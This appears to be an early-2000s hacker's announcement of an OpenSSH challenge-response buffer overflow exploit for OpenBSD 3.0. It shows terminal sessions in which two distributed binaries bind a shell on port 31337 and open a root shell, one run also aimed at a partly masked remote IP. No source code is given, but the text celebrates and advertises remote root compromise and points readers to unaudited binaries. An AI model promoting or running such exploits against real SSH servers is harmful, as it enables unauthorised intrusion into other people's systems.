OpenSSH Challenge-Response Integer, Buffer Overflow Exploit v0.000000002

++ Update ++

Hello. I saw the OpenSSH vulnerability that was found last July, because a free OpenBSD machine was given to me. :-D

This is 'Proof of concept' only, because very well written advisories from ISS or GOBBLES are already present. I read them and enjoyed them.

++! On my machine, a very interesting result; I present the test example I finished.

First, the test example. This was tested on OpenBSD 3.0 machines only. It may perhaps pass with other OpenSSH versions. :-)

__
$ ls -al /home/x82/.ssh
ls: /root/.ssh: No such file or directory
$ ./0x82-ssh-client localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
RSA key fingerprint is 39:72:26:68:b1:2a:67:46:f8:02:ef:fa:b7:91:8b:30.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
^C
$ netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp        0      0  *.31337                *.*                    LISTEN
...
$ ls -al /home/x82/.ssh/
total 3
drwx------  2 x82  x82  512 Jan 23 07:10 .
drwxr-xr-x  3 x82  x82  512 Jan 23 07:10 ..
-rw-r--r--  1 x82  x82  219 Jan 23 07:10 known_hosts
$
--

HeHeHe, it may deliver a 31337 rootshell to you.

OK. Next, the funny job. :-)

__
$ ./0x82-ssh-client -l root 61.xx.xx.xx
^C
$ ./0x82-ssh-connect -t

++ OpenSSH Remote exploit 31337 connect code!
code by Xpl017Elz.
--++TEST++TEST++TEST++TEST++--
++ Test connecting, http://x82.inetcop.org
++ hehe, OK. :-)
--++31337++31337++31337++31337++--
++ Real connecting, localhost:31337
++ Connected to localhost:31337 !
++ Executed shell successfully !
** OK, It's Rootshell
OpenBSD testsub 3.0 GENERIC#94 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
sh: No controlling tty (open /dev/tty: Device not configured)
sh: Can't find tty file descriptor
sh: warning: won't have full job control
# exit
** Happy Exploit !
$
--

Yahooo!
It's most pleasant if you use 0x82-ssh-connect. These are all OpenBSD binaries.

OpenBSD Binaries:

# file 0x82-ssh-client
0x82-ssh-client: OpenBSD/i386 demand paged dynamically linked executable not stripped
# file 0x82-ssh-connect
0x82-ssh-connect: OpenBSD/i386 demand paged dynamically linked executable not stripped
#

Requests and questions about this: never send them to me. Whether I reply is my freedom. If you read the very excellent ISS and GOBBLES advisories, you can know! And this code is not backdoor code. A person who desires the source code is very regrettable. Thank you.

P.S: Sorry for my poor English. Ah, only... I may exhibit the exploit source code to Koreans. It's for the development of the country.

--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net & http://x82.inetcop.org
GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
--